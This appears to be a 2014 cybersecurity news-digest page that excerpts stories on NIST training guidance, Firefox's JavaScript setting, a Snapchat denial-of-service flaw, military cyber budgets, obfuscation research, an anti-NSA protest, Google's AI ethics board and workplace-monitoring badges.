Skip to main content Skip to footer site map
Center for Cyber Security Studies

February 2014

National Institute of Standards and Technology(NIST) to Update Cyber Education Guidelines

The National Institute of Standards and Technology this spring will unveil updated guidance on role-based cybersecurity training, which will help government agencies as well as private businesses to protect information, NIST Computer Scientist Patricia Toth says. Toth is taking a lead role in developing the guidance, which will be known as Special Publication 800-16 Rev. 1. The guidance will focus on training tied to each individual's role within the organization, teaching them specifically what they need to do to help protect their organization's resources, she says. "One example might be someone who is doing incident response," she says in an interview with Information Security Media Group (transcript below). "They need to know very specifically, when an incident happens, how they need to report it, how they need to respond and what they need to do on their particular system to prevent any further damage." In the interview, Toth discusses: How the new guidance differs from the original document published more than 15 years ago; Differences between cybersecurity education and role-based training;
Challenges of determining whether the role-based training programs are effective.

Education Tip for SI110: Can't Turn off Javascript!!! Why?... special thanks to Dr. Dan Roach for this one...

As reported by Dr. Dan Roach (and I use his words here), this might not be labeled as 'breaking news", but is probably news to most of us: 4-5 months ago the most recent version of Firefox intentionally made it harder for users to disable JavaScript. You can see it in the official Firefox 23 "release notes" here: And here's a "support request" that goes into a little more detail: Of note, you can still disable JavaScript using specialized add-ons or by going to the about:config page, but obviously most users will never bother with such things. Dr. Roach writes: " I find this really interesting as an example of the trade-offs between security and usability. The decision has been made that the web is now more or less unusable without client-side scripting. This means we will have to rely on the browser itself to protect users from cross-site scripting (XSS) and other similar attacks, rather than telling users to disable the setting on pages they don't trust."

Hackers can use Snapchat to disable iPhones, researcher says,0,3127301.story#axzz2sfxcRlN4

A cyber security researcher has discovered a vulnerability within the Snapchat mobile app that makes it possible for hackers to launch a denial-of-service attack that temporarily freezes a user's iPhone. Jaime Sanchez, who works as a cyber-security consultant for Telefonica, a major telecommunications company in Spain, said he and another researcher found a weakness in Snapchat’s system that allows hackers to send thousands of messages to individual users in a matter of seconds. Sanchez said he and the fellow researcher discovered the glitch on their own time. Flooding one user with so many messages can clog their account to the point that the Snapchat app causes the entire device to freeze and ultimately crash, or require that the user perform a hard reset.

National Guard Fights for Cyber Role

Chinese and Russian hackers have everybody running scared. So whatever else happens with the president’s budget request for fiscal year 2015, we know it will include more money for things cyber, from purely defensive network security to black-budget “offensive cyber weapons” such as the Stuxnet worm. But one big thing remains in doubt: the role of the National Guard. Cyber Command wants the Guard to help. Guard leaders want to help CYBERCOM. And the Army has at least considered a proposal to fund 390 positions in 10 new “Cyber Protection Teams” to be created in the Army National Guard. Whether this idea will get funded is being wrestled over behind locked doors and in the context of increasingly bitter fights between active-duty and reserve forces. The budgetary question marks loom so large that one senior official at the National Guard Bureau emailed a warning to the Adjutants General, the Guard commanders of every state, territory, and the District of Columbia: Don’t get out in front of what the federal budget will support.

Congress Must Make 'Unimaginable' Defense Budget Choices: HASC's Adam Smith

“I understand that a one percent cut in the COLA is not insubstantial. It is a decrease in what the increase in retirements is going to be,” he said. (Under the plan, benefits would not actually decrease below current levels, they just wouldn’t increase as quickly in the future — and fall behind inflation by certain measures). “If you’re not going to cut this, what are you going to cut?” Activists for veterans and military personnel have argued that changing promised benefits is a breach of faith that will undermine trust in the military and thus people’s willingness to join up and stay in, one reporter noted. “I don’t have sympathy for that argument,” Smith said. “Believe me, I think our military ought to be the best compensated, best taken care of military in the world — and I think it is.” “If we are going to deal [based] on what you were promised when you came in,” Smith said scathingly, “then let’s get rid of the [post-9/11] updated GI bill, let’s get rid of the yearly pay increases, let’s get rid of all the increase in combat pay, let’s get rid of all of the billions, the tens of billions of dollars that we added after you got recruited.”

Cryptography Breakthrough Could Make Software Unhackable

Precisely because of obfuscation’s power, many computer scientists, including Sahai and his colleagues, thought it was impossible. “We were convinced it was too powerful to exist,” he said. Their earliest research findings seemed to confirm this, showing that the most natural form of obfuscation is indeed impossible to achieve for all programs.
Then, on July 20, 2013, Sahai and five co-authors posted a paper on the Cryptology ePrint Archive demonstrating a candidate protocol for a kind of obfuscation known as “indistinguishability obfuscation.” Two days later, Sahai and one of his co-authors, Brent Waters, of the University of Texas, Austin, posted a second paper that suggested, together with the first paper, that this somewhat arcane form of obfuscation may possess much of the power cryptographers have dreamed of. “This is the first serious positive result” when it comes to trying to find a universal obfuscator, said Boaz Barak, of Microsoft Research in Cambridge, Mass. “The cryptography community is very excited.”

Internet Anti-NSA Protest Starts Tuesday

Circle Feb. 11 on your calendar. You're going to notice something a little different when browsing the Internet that day. Thousands of civil-liberty and online-freedom groups and websites will take to the digital streets next week to wage a coordinated war against the National Security Agency's spying powers, a battle strike reminiscent of a virtual protest that two years ago killed an online piracy bill. Billing the protest as "The Day We Fight Back," organizers are promising banners will be prominently displayed on websites across the Internet urging users to engage in viral activity expressing their opposition to the NSA. Additionally, those banners will ask readers to flood the telephone lines and email in-boxes of congressional offices to voice their support of the Freedom Act, a bill in Congress that aims to restrict the government's surveillance authority. The roster of participating groups, which organizers say now tops 4,000, includes the American Civil Liberties Union, reddit, Tumblr, Mozilla, DailyKos, and Amnesty International.

Nine Factors Creating a ‘Perfect Storm’ Driving the Internet of Things to $14.4 trillion (special thanks to LCDR Connett)

The Industrial Internet Of Things

What role will humans play?

Shifting to Overdrive

Finally ... an example

Protests, Blocking Google Buses: What the Hell is Up with Silicon Valley

Silicon Valley can’t afford to ignore its haters. Even just the image of arrogance could kill the industry — and future innovation. Silicon Valley is always selling the next category, the new frontier, the thing you’ll need tomorrow but can’t even imagine wanting today. A computer in your home. The Internet in your pocket. Your music in the cloud. A smartphone on your wrist or face. Unlike any other industry, tech relies on not merely trust but faith that a leap into the unknown, into breaking routines, will be rewarded. Since business models of tech companies are built on monetizing data that users freely supply, losing the trust and optimism of customers wouldn’t just mean failing to sell the next big thing … it could mean failing to make it. Read WIRED editor Bill Wasik’s argument here.

Google's New A.I. Ethics Board... (Fear of the Machine?)

In 2011, the co-founder of DeepMind, the artificial intelligence company acquired this week by Google, made an ominous prediction more befitting a ranting survivalist than an award-winning computer scientist. “Eventually, I think human extinction will probably occur, and technology will likely play a part in this,” DeepMind’s Shane Legg said in an interview with Alexander Kruel. Among all forms of technology that could wipe out the human species, he singled out artificial intelligence, or AI, as the “number 1 risk for this century.” Google’s acquisition of DeepMind came with an estimated $400 million price tag and an unusual stipulation that adds extra gravity -- and a dose of reality -- to Legg’s warning: Google agreed to create an AI safety and ethics review board to ensure this technology is developed safely, as The Information first reported and The Huffington Post confirmed. (A Google spokesman said that DeepMind had been acquired, but declined to comment further.) Even for a company that predictably pursues unpredictable projects (see: Internet-deploying balloons), an AI ethics board marks a surprising first for Google, and has some people questioning why Google is so concerned with the morality of this technology, as opposed to, say, the ethics of reading your email.

Work Place Monitoring... How your boss can keep you on a leash

If you're a person who hates it when your supervisor looks over your shoulder at work, you may want to stop reading this column right now. Because what follows is only going to depress you. Hitachi, the big electronics company based in Japan, is manufacturing and selling to corporations a device intended to increase efficiency in the workplace. It has a rather bland and generic-sounding name: the Hitachi Business Microscope. But what it is capable of doing ... well, just imagine being followed around the office or the factory all day by the snoopiest boss in the world. Even into the restroom. And, the thing is, once you hear about it, you just know that, from a management point of view, it is an innovation of absolute genius. Here's how it works: The device looks like an employee ID badge that most companies issue. Workers are instructed to wear it in the office. Embedded inside each badge, according to Hitachi, are "infrared sensors, an accelerometer, a microphone sensor and a wireless communication device." Hitachi says that the badges record and transmit to management "who talks to whom, how often, where and how energetically." It tracks everything. If you get up to walk around the office a lot, the badge sends information to management about how often you do it, and where you go. If you stop to talk with people throughout the day, the badge transmits who you're talking to (by reading your co-workers' badges), and for how long. Do you contribute at meetings, or just sit there? Either way, the badge tells your bosses.

go to Top